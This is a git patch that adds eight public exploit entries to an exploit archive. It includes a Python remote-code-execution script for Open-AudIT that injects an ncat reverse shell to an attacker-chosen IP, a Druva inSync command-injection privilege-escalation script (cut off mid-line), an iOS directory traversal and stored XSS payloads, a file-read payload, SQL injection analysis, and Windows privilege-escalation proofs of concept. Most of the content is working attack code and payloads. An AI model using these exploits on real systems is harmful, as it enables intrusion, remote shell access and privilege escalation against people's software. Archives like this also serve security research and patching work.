From a99d181f246f4e0a0df9fdd12050c27e210d6f96 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 30 Apr 2020 05:01:48 +0000 Subject: [PATCH] DB: 2020-04-30 8 changes to exploits/shellcodes Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC) EmEditor 19.8 - Insecure File Permissions Druva inSync Windows Client 6.5.2 - Local Privilege Escalation Open-AudIT Professional 3.3.1 - Remote Code Execution School ERP Pro 1.0 - Arbitrary File Read Easy Transfer 1.7 for iOS - Directory Traversal hits script 1.0 - 'item_name' SQL Injection --- exploits/ios/webapps/48395.txt | 187 ++++++++++++++++++++++++++++++ exploits/php/webapps/48393.py | 131 +++++++++++++++++++++ exploits/php/webapps/48394.txt | 42 +++++++ exploits/php/webapps/48399.txt | 100 ++++++++++++++++ exploits/windows/local/48396.txt | 34 ++++++ exploits/windows/local/48397.txt | 193 +++++++++++++++++++++++++++++++ exploits/windows/local/48398.txt | 67 +++++++++++ exploits/windows/local/48400.txt | 54 +++++++++ files_exploits.csv | 8 ++ 9 files changed, 816 insertions(+) create mode 100644 exploits/ios/webapps/48395.txt create mode 100755 exploits/php/webapps/48393.py create mode 100644 exploits/php/webapps/48394.txt create mode 100644 exploits/php/webapps/48399.txt create mode 100644 exploits/windows/local/48396.txt create mode 100644 exploits/windows/local/48397.txt create mode 100644 exploits/windows/local/48398.txt create mode 100644 exploits/windows/local/48400.txt diff --git a/exploits/ios/webapps/48395.txt b/exploits/ios/webapps/48395.txt new file mode 100644 index 000000000..4bc8142e0 --- /dev/null +++ b/exploits/ios/webapps/48395.txt @@ -0,0 +1,187 @@ +# Title: Easy Transfer 1.7 for iOS - Directory Traversal +# Author: Vulnerability Laboratory +# Date: 2020-04-27 +# Software: https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078 +# CVE: N/A + +Document Title: +=============== +Easy Transfer v1.7 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2223 + + +Common Vulnerability Scoring System: +==================================== +7.1 + + +Affected Product(s): +==================== +Rubikon Teknoloji +Product: Easy Transfer v1.7 - iOS Mobile Web-Application +(Copy of the Homepage: +https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078 ) + + +Vulnerability Disclosure Timeline: +================================== +2020-04-27: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +1.1 +A directory traversal web vulnerability has been discovered in the Easy +Transfer Wifi Transfer v1.7 ios mobile application. +The vulnerability allows remote attackers to change the application path +in performed requests to compromise the local application +or file-system of a mobile device. Attackers are for example able to +request environment variables or a sensitive system path. + +The directory-traversal web vulnerability is located in the main +application path request performed via GET method. Attackers are +able to request for example the local path variables of the web-server +by changing the local path in the performed request itself. +In a first request the attack changes the path, the host redirects to +complete the adress with "..". Then the attacker just +attaches /.. a final slash to its request and the path can be accessed +via web-browser to download or list local files. + +Exploitation of the directory traversal web vulnerability requires no +privileged web-application user account or user interaction. +Successful exploitation of the vulnerability results in information +leaking by unauthorized file access and mobile application compromise. + + +1.2 +Multiple persistent cross site scripting vulnerability has been +discovered in the Easy Transfer Wifi Transfer v1.7 ios mobile application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise the mobile +web-application from the application-side. + +The persistent vulnerabilities are located in the `Create Folder` and +`Move/Edit` functions. Attackers are able to inject own malicious +script codes to the `oldPath`, `newPath` and `path` parameters. The +request method to inject is POST and the attack vector is located on +the application-side. + +Successful exploitation of the vulnerability results in session +hijacking, persistent phishing attacks, persistent external redirects +to malicious source and persistent manipulation of affected application +modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Create Folder +[+] Move/Edit + +Vulnerable Parameter(s): +[+] oldPath +[+] newPath +[+] path + + +Proof of Concept (PoC): +======================= +1.1 +The directory traversal web vulnerability can be exploited by remote +attackers with wifi network access without user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +PoC: Exploitation +http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F +..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../ + +[{"path":"/../../../../../../../../../../../../../../../../../../../../../../../../../../../test/","name":"test"}] + + +--- PoC Session Logs [GET] --- (list) +http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F +..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../ +Host: localhost +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Connection: keep-alive +- +GET: HTTP/1.1 200 OK +Content-Length: 213 +Content-Type: application/json +Connection: Close + + +1.2 +The persistent input validation web vulnerabilities can be exploited by +remote attackers with wifi network access with low user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +PoC: Exploitation +alert(document.domain) + + +--- PoC Session Logs [POST] --- (Create & Move) +http://localhost/create +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 47 +Origin: http://localhost +Connection: keep-alive +Referer: http://localhost/ +path=/testalert(document.domain) +- +POST: HTTP/1.1 200 OK +Cache-Control: no-cache +Content-Length: 2 +Content-Type: application/json +Connection: Close +- +http://localhost/move +Host: localhost +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 69 +Origin: http://localhost +Connection: keep-alive +Referer: http://localhost/ +oldPath=/test/alert(document.domain)&newPath=/testalert(document.domain) +- +POST: HTTP/1.1 200 OK +Content-Length: 411 +Content-Type: text/html; charset=utf-8 +Connection: Close +- [GET] (Execution) +http://localhost/evil.source +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Connection: keep-alive +Referer: http://localhost/ + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/php/webapps/48393.py b/exploits/php/webapps/48393.py new file mode 100755 index 000000000..de41b5a2b --- /dev/null +++ b/exploits/php/webapps/48393.py @@ -0,0 +1,131 @@ +# Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution +# Date: 2020-04-22 +# Exploit Author: Askar +# CVE: CVE-2020-8813 +# Vendor Homepage: https://opmantek.com/ +# Version: v3.3.1 +# Tested on: Ubuntu 18.04 / PHP 7.2.24 + +#!/usr/bin/python3 + +import requests +import sys +import warnings +import random +import string +from bs4 import BeautifulSoup +from urllib.parse import quote + +warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4') + + +if len(sys.argv) !=3D 6: + print("[~] Usage : ./openaudit-exploit.py url username password ip port= +") + exit() + +url =3D sys.argv[1] +username =3D sys.argv[2] +password =3D sys.argv[3] +ip =3D sys.argv[4] +port =3D sys.argv[5] + +request =3D requests.session() + +def inject_payload(): + configuration_path =3D url+"/en/omk/open-audit/configuration/90" + data =3D 'data=3D{"data":{"id":"90","type":"configuration","attributes"= +:{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, = +port) + request.patch(configuration_path, data) + print("[+] Payload injected in settings") + + +def start_discovery(): + discovery_path =3D url+"/en/omk/open-audit/discoveries/create" + post_discovery_path =3D url+"/en/omk/open-audit/discoveries" + scan_name =3D "".join([random.choice(string.ascii_uppercase) for i in r= +ange(10)]) + req =3D request.get(discovery_path) + + response =3D req.text + soup =3D BeautifulSoup(response, "html5lib") + token =3D soup.findAll('input')[5].get("value") + buttons =3D soup.findAll("button") + headers =3D {"Referer" : discovery_path} + request_data =3D { + "data[attributes][name]":scan_name, + "data[attributes][other][subnet]":"10.10.10.1/24", + "data[attributes][other][ad_server]":"", + "data[attributes][other][ad_domain]":"", + "submit":"", + "data[type]":"discoveries", + "data[access_token]":token, + "data[attributes][complete]":"y", + "data[attributes][org_id]":"1", + "data[attributes][type]":"subnet", + "data[attributes][devices_assigned_to_org]":"", + "data[attributes][devices_assigned_to_location]":"", + "data[attributes][other][nmap][discovery_scan_option_id]":"1", + "data[attributes][other][nmap][ping]":"y", + "data[attributes][other][nmap][service_version]":"n", + "data[attributes][other][nmap][open|filtered]":"n", + "data[attributes][other][nmap][filtered]":"n", + "data[attributes][other][nmap][timing]":"4", + "data[attributes][other][nmap][nmap_tcp_ports]":"0", + "data[attributes][other][nmap][nmap_udp_ports]":"0", + "data[attributes][other][nmap][tcp_ports]":"22,135,62078", + "data[attributes][other][nmap][udp_ports]":"161", + "data[attributes][other][nmap][timeout]":"", + "data[attributes][other][nmap][exclude_tcp_ports]":"", + "data[attributes][other][nmap][exclude_udp_ports]":"", + "data[attributes][other][nmap][exclude_ip]":"", + "data[attributes][other][nmap][ssh_ports]":"22", + "data[attributes][other][match][match_dbus]":"", + "data[attributes][other][match][match_fqdn]":"", + "data[attributes][other][match][match_dns_fqdn]":"", + "data[attributes][other][match][match_dns_hostname]":"", + "data[attributes][other][match][match_hostname]":"", + "data[attributes][other][match][match_hostname_dbus]":"", + "data[attributes][other][match][match_hostname_serial]":"", + "data[attributes][other][match][match_hostname_uuid]":"", + "data[attributes][other][match][match_ip]":"", + "data[attributes][other][match][match_ip_no_data]":"", + "data[attributes][other][match][match_mac]":"", + "data[attributes][other][match][match_mac_vmware]":"", + "data[attributes][other][match][match_serial]":"", + "data[attributes][other][match][match_serial_type]":"", + "data[attributes][other][match][match_sysname]":"", + "data[attributes][other][match][match_sysname_serial]":"", + "data[attributes][other][match][match_uuid]":"" + + } + print("[+] Creating discovery ..") + req =3D request.post(post_discovery_path, data=3Drequest_data, headers= +=3Dheaders, allow_redirects=3DFalse) + disocvery_url =3D url + req.headers['Location'] + "/execute" + print("[+] Triggering payload ..") + print("[+] Check your nc ;)") + request.get(disocvery_url) + + +def login(): + login_info =3D { + "redirect_url": "/en/omk/open-audit", + "username": username, + "password": password + } + login_request =3D request.post(url+"/en/omk/open-audit/login", login_in= +fo) + login_text =3D login_request.text + if "There was an error authenticating" in login_text: + return False + else: + return True + +if login(): + print("[+] LoggedIn Successfully") + inject_payload() + start_discovery() +else: + print("[-] Cannot login!") \ No newline at end of file diff --git a/exploits/php/webapps/48394.txt b/exploits/php/webapps/48394.txt new file mode 100644 index 000000000..27b503818 --- /dev/null +++ b/exploits/php/webapps/48394.txt @@ -0,0 +1,42 @@ +# Exploit Title: School ERP Pro 1.0 - Arbitrary File Read +# Date: 2020-04-28 +# Author: Besim ALTINOK +# Vendor Homepage: http://arox.in +# Software Link: https://sourceforge.net/projects/school-erp-ultimate/ +# Version: latest version +# Tested on: Xampp +# Credit: İsmail BOZKURT +# CVE: N/A + +Vulnerable code: (/student_staff/download.php) +- File Name: download.php +- Content of the download.php + + + +------------ +*Payload:* +--------------- + +http://localhost/school_erp/student_staff/download.php?document=../includes/constants.inc.php +------------------------ +*After run payload: (we accessed of the file content)* +------------------------ + + \ No newline at end of file diff --git a/exploits/php/webapps/48399.txt b/exploits/php/webapps/48399.txt new file mode 100644 index 000000000..33b05660d --- /dev/null +++ b/exploits/php/webapps/48399.txt @@ -0,0 +1,100 @@ +# Exploit Title: hits script 1.0 - 'item_name' SQL Injection +# Date: 2020-04-27 +# Exploit Author: SajjadBnd +# Vendor Homepage: https://hits.ir +# Software Link: http://dl.persianscript.ir/script/hitsir-script-persian%28PersianScript.ir%29.zip +# Software Link(mirror): http://dl.nuller.ir/hitsir-script-persian[www.nuller.ir].zip +# Version: 1.0 +# Tested on: Win10 Professional x64 + +[ description of script ] + +With this script you can set up a site to exchange statistics and traffic as well as +increase rankings. In this script, it is possible to exchange Google +1, +exchange Facebook points, exchange Twitter followers, +exchange YouTube visitors, exchange visit statistics. + +[ poc ] + +file : ipn.php + +parameters : 'item_name' , 'item_number' +method : POST +source [ + +36: mysql_query $pack = mysql_fetch_object(mysql_query("SELECT * FROM `c_pack` WHERE `name`='{$item_name}' AND `coins`='{$item_number}'")); +19: $item_name = $_POST['item_name']; +20: $item_number = $_POST['item_number']; + +requires: +4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename"))) +31: if(!$fp) else +35: if(strcmp($res, "VERIFIED") == 0) + +] + +parameter : 'custom' +method : POST +source [ + +43: mysql_query mysql_query("UPDATE `users` SET `coins`=`coins`+'{$pack->coins}' WHERE `id`='{$custom}'"); +27: $custom = $_POST['custom']; + +requires: +4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename"))) +31: if(!$fp) else +35: if(strcmp($res, "VERIFIED") == 0) +41: if(($receiver_email == $site->paypal) && ($payment_amount == $pack->price) && ($payment_status == 'Completed')) + +] + +parameters : 'item_name','mc_gross' +method : POST +source [ + +44: mysql_query mysql_query("INSERT INTO `transactions` (user, points, pack, money, date) VALUES('{$user->login}', '{$pack->coins}', '{$item_name}', '{$payment_amount}', NOW())"); +19: $item_name = $_POST['item_name']; +22: $payment_amount = $_POST['mc_gross']; + +requires: +4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename"))) +31: if(!$fp) else +35: if(strcmp($res, "VERIFIED") == 0) +41: if(($receiver_email == $site->paypal) && ($payment_amount == $pack->price) && ($payment_status == 'Completed')) + +] + + +file : register.php + +parameters : 'PlusREF','register' +method : COOKIE,POST +source [ + +22: mysql_query $user1 = mysql_query("SELECT * FROM `users` WHERE `id`='{$ref}'"); +21: $ref = $_COOKIE['PlusREF']; + +requires: +3: if(isset($_POST['register'])) +19: if(!checkpwd ($sec['password'], $sec['password2'])) else +20: if(isset($_COOKIE['PlusREF'])) + +] + +& + +source [ + +40: mysql_query mysql_query("INSERT INTO `users`(email,login,IP,pass,passdecoded,ref,signup,activate) values('{$sec['email']}','{$sec['user']}','$final','$passc','$passa','{$ref}',NOW(),'{$activare}')") or +37: $final = visitorip (); +39: $passc = md5($passa); +38: $passa = $sec['password']; +38: $passa = $sec['password']; +21: $ref = $_COOKIE['PlusREF']; // if(isset($_COOKIE)), +26: $activare = rand(000000000, 999999909); + +requires: +3: if(isset($_POST['register'])) +19: if(!checkpwd ($sec['password'], $sec['password2'])) else + +] \ No newline at end of file diff --git a/exploits/windows/local/48396.txt b/exploits/windows/local/48396.txt new file mode 100644 index 000000000..1c0d82ccf --- /dev/null +++ b/exploits/windows/local/48396.txt @@ -0,0 +1,34 @@ +# Exploit Title: Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path +# Discovery by: Roberto Piña +# Discovery Date: 2020-04-28 +# Vendor Homepage: https://andreaelectronics.com/ +# Software Link : https://andreaelectronics.com/ +# Tested Version: 1.0.64.7 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Andrea" | findstr /i /v """ +Andrea ST Filters Service AESTFilters C:\Program Files\IDT\WDM\AESTSr64.exe Auto + +C:\>sc qc AESTFilters +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: AESTFilters + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Andrea ST Filters Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + + +#Exploit: +# A successful attempt would require the local user to be able to insert their code in the system root path +# undetected by the OS or other security applications where it could potentially be executed during +# application startup or reboot. If successful, the local user's code would execute with the elevated +# privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/48397.txt b/exploits/windows/local/48397.txt new file mode 100644 index 000000000..c89d535b0 --- /dev/null +++ b/exploits/windows/local/48397.txt @@ -0,0 +1,193 @@ +# Title: Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC) +# Author: Vulnerability Laboratory +# Date: 2020-04-28 +# Vendor: https://www.internetdownloadmanager.com +# Software: https://www.internetdownloadmanager.com/download.html +# CVE: N/A + +Document Title: +=============== +Internet Download Manager v6.37.11.1 - Stack Buffer Overflow Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2236 + + +Common Vulnerability Scoring System: +==================================== +7.1 + + +Vulnerability Disclosure Timeline: +================================== +2020-04-28: Public Disclosure (Vulnerability Laboratory) +(Copy of the Homepage: +https://www.internetdownloadmanager.com/support/about_us.html ) +(Sofwtare Product: https://www.internetdownloadmanager.com/download.html) + + +Exploitation Technique: +======================= +Local + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +Multiple stack buffer overflow vulnerabilities has been discovered in +the official Internet Download Manager v6.37.11.1 software. +The bufer overflow allows to overwrite registers of the process to +compromise the file-system by elevates local process privileges. + +1.1 +The first stack buffer overflow is located in the `search` function of +the downloads menu. The search function itself does not use +any secure restriction in the requested search variable of the inputs. +Local attackers with access to the software are able to overflow +the registers to elevate local process privileges. Thus allows a local +attacker to compromise the local computer- or file-system. + +1.2 +The second stack buffer overflow is located in the `Export/Import` +function of the tasks menu. Local users are able to import and +export the download tasks as *.ef2 file. Local attackers are able to +import manipulated *.ef2 files with manipulated referer and +source url to overwrite the eip register. The issue occurs because of +the insufficient ef2 filetype (context) validation process +that does not perform any length restrictions. + +The security risk of the local stack buffer overflow vulnerabilities in +the software are estimated as high with a cvss count of 7.1. +Exploitation of the buffer overflow vulnerability requires a low +privilege or restricted system user account without user interaction. +Successful exploitation of the vulnerability results in overwrite of the +active registers to compromise of the computer system or process. + +Vulnerable Module(s): +[+] Search +[+] Import/Export (ef2) + + +Proof of Concept (PoC): +======================= +1.1 +The stack buffer overflow vulnerability can be exploited by local +attackers with system user privileges without user interaction. +For security demonstration or to reproduce the local vulnerability +follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Open the software +2. Click the downloads menu and open the search +3. Inject a large unicode payload inside the search input field and transmit +4. The software crashs with several uncaught exception because of +overwritten register (0168D8F0) +5. Successful reproduce of the local buffer overflow vulnerability! + + +--- Debug Logs (0168D8F0) --- +00d61850 668b08 mov cx,word ptr [eax] ds:002b:41414141 +- +00D6186D |. 56 PUSH ESI ; /Arg1 +- +00D61882 |. E8 59FFFFFF CALL IDMan.00D617E0 ; +IDMan.00D617E0 +- +00D6189B |> 50 PUSH EAX ; /Arg1 +- +00D6189E |. E8 3DFFFFFF CALL IDMan.00D617E0 ; +IDMan.00D617E0 +- +Call stack + Address=0168C79C + Stack=00DFE0F2 + Procedure / arguments=IDMan.00D617E0 + Called from=IDMan.00DFE0ED + Frame=0168E02C +- +SEH chain +Address SE handler +0168C790 IDMan.00F751E8 +0168D8F0 41414141 +- +EAX 41414141 +ECX 01680000 +EDX 41414141 +EBX 00000001 +ESP 0168C76C +EBP 0168E02C UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..." +ESI 0168C7AC UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..." +EDI 00410043 +EIP 00D61850 IDMan.00D61850 +Executable modules + Base=00D60000 + Size=00539000 (5476352.) + Entry=00F5CB1C IDMan. + Name=IDMan + File version=6, 37, 11, 2 + Path=C:Program Files (x86)Internet Download ManagerIDMan.exe + + +1.2 +The stack buffer overflow vulnerability can be exploited by local +attackers with system user privileges without user interaction. +For security demonstration or to reproduce the local vulnerability +follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Open the software +2. Start the bof_poc.pl +3. Open the tasks menu +4. Click import and import *.ef2 poc +Note: The software process crashs on import with uncaught exception +5. Successful reproduce of the local buffer overflow vulnerability! + + +Usage Example: Export/Import (*.ef2) +< +https://www.vulnerability-lab.com/download_content.php?id=1337 +referer: https://www.vulnerability-lab.com/ +User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko +> + + +PoC: Exploit +#!/usr/bin/perl +# Local Stack Buffer Overflow Exploit for Internet Download Manager +v6.37.11.1 +# Vulnerability Laboratory - Benjamin Kunz Mejri +my $poc = "bof_poc.ef2" ; +print "[+] Producing bof_poc.ef2 ..." ; +my $buff0=" "."<" x 1; +my $buff1=" n https://"."A" x 1024; +my $buff2=" n Referer:"."A" x 1024; +my $buff3=" n User Agent:"."A" x 1024; +my $buff4=" n ".">" x 1; +open(ef2, ">>$poc") or die "Cannot open $poc"; +print ef2 $buff0; +print ef2 $buff1; +print ef2 $buff2; +print ef2 $buff3; +print ef2 $buff4; +close(ef2); +print "n[+] done !"; + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/windows/local/48398.txt b/exploits/windows/local/48398.txt new file mode 100644 index 000000000..a3b79fc0c --- /dev/null +++ b/exploits/windows/local/48398.txt @@ -0,0 +1,67 @@ +# Exploit Title: EmEditor 19.8 - Insecure File Permissions +# Date: 2020-04-27 +# Exploit Author: SajjadBnd +# Vendor Homepage: https://www.emeditor.com/ +# Software Link: https://support.emeditor.com/en/downloads/suggested +# Version: 19.8 +# Tested on: Win10 Professional x64 + +[ Description ] + +EmEditor is a fast, lightweight, yet extensible, easy-to-use text editor for Windows. +Both native 64-bit and 32-bit builds are available, and moreover, +the 64-bit includes separate builds for SSE2 (128-bit), AVX-2 (256-bit), +and AVX-512 (512-bit) instruction sets. + +[ PoC ] + +C:\Users\user\AppData\Local\Programs\EmEditor +λ icacls *.exe + +ee128.exe NT AUTHORITY\SYSTEM:(F) +BUILTIN\Administrators:(F) +DESKTOP-K4UDI4I\user:(F) + +ee256.exe NT AUTHORITY\SYSTEM:(F) +BUILTIN\Administrators:(F) +DESKTOP-K4UDI4I\user:(F) + +ee512.exe NT AUTHORITY\SYSTEM:(F) +BUILTIN\Administrators:(F) +DESKTOP-K4UDI4I\user:(F) + +EEAdmin.exe NT AUTHORITY\SYSTEM:(F) +BUILTIN\Administrators:(F) +DESKTOP-K4UDI4I\user:(F) + +eehlpver.exe NT AUTHORITY\SYSTEM:(F) +BUILTIN\Administrators:(F) +DESKTOP-K4UDI4I\user:(F) + +eeupdate.exe NT AUTHORITY\SYSTEM:(F) +BUILTIN\Administrators:(F) +DESKTOP-K4UDI4I\user:(F) + +emedhtml.exe NT AUTHORITY\SYSTEM:(F) +BUILTIN\Administrators:(F) +DESKTOP-K4UDI4I\user:(F) + +EmEditor.exe NT AUTHORITY\SYSTEM:(F) +BUILTIN\Administrators:(F) +DESKTOP-K4UDI4I\user:(F) + +emedtray.exe NT AUTHORITY\SYSTEM:(F) +BUILTIN\Administrators:(F) +DESKTOP-K4UDI4I\user:(F) + +emedws.exe NT AUTHORITY\SYSTEM:(F) +BUILTIN\Administrators:(F) +DESKTOP-K4UDI4I\user:(F) + +Successfully processed 10 files; Failed processing 0 files + +[ Exploit - Privilege Escalation ] + +Replace any *.exe files with any executable +malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation) +- Also you can use DLL Hijacking technique(emonig.dll,emregexp.dll,emtoast.dll..) ;D \ No newline at end of file diff --git a/exploits/windows/local/48400.txt b/exploits/windows/local/48400.txt new file mode 100644 index 000000000..68377f922 --- /dev/null +++ b/exploits/windows/local/48400.txt @@ -0,0 +1,54 @@ +# Exploit Title: Druva inSync Windows Client 6.5.2 - Local Privilege Escalation +# Date: 2020-04-28 +# Exploit Author: Chris Lyne +# Vendor Homepage: druva.com +# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.5.2/inSync6.5.2r99097.msi +# Version: 6.5.2 +# Tested on: Windows 10 +# CVE : CVE-2019-3999 +# See also: https://www.tenable.com/security/research/tra-2020-12 + +import socket +import struct +import sys + +# Command injection in inSyncCPHwnet64 RPC service +# Runs as nt authority\system. so we have a local privilege escalation + +if len(sys.argv) < 2: + print "Usage: " + __file__ + " " + print "E.g. " + __file__ + " \"net user /add tenable\"" + sys.exit(0) + +ip = '127.0.0.1' +port = 6064 +command_line = sys.argv[1] + +# command gets passed to CreateProcessW +def make_wide(str): + new_str = '' + for c in str: + new_str += c + new_str += '\x00' + return new_str + +hello = "inSync PHC RPCW[v0002]" +func_num = "\x05\x00\x00\x00" # 05 is to run a command +command_line = make_wide(command_line) +command_length = struct.pack('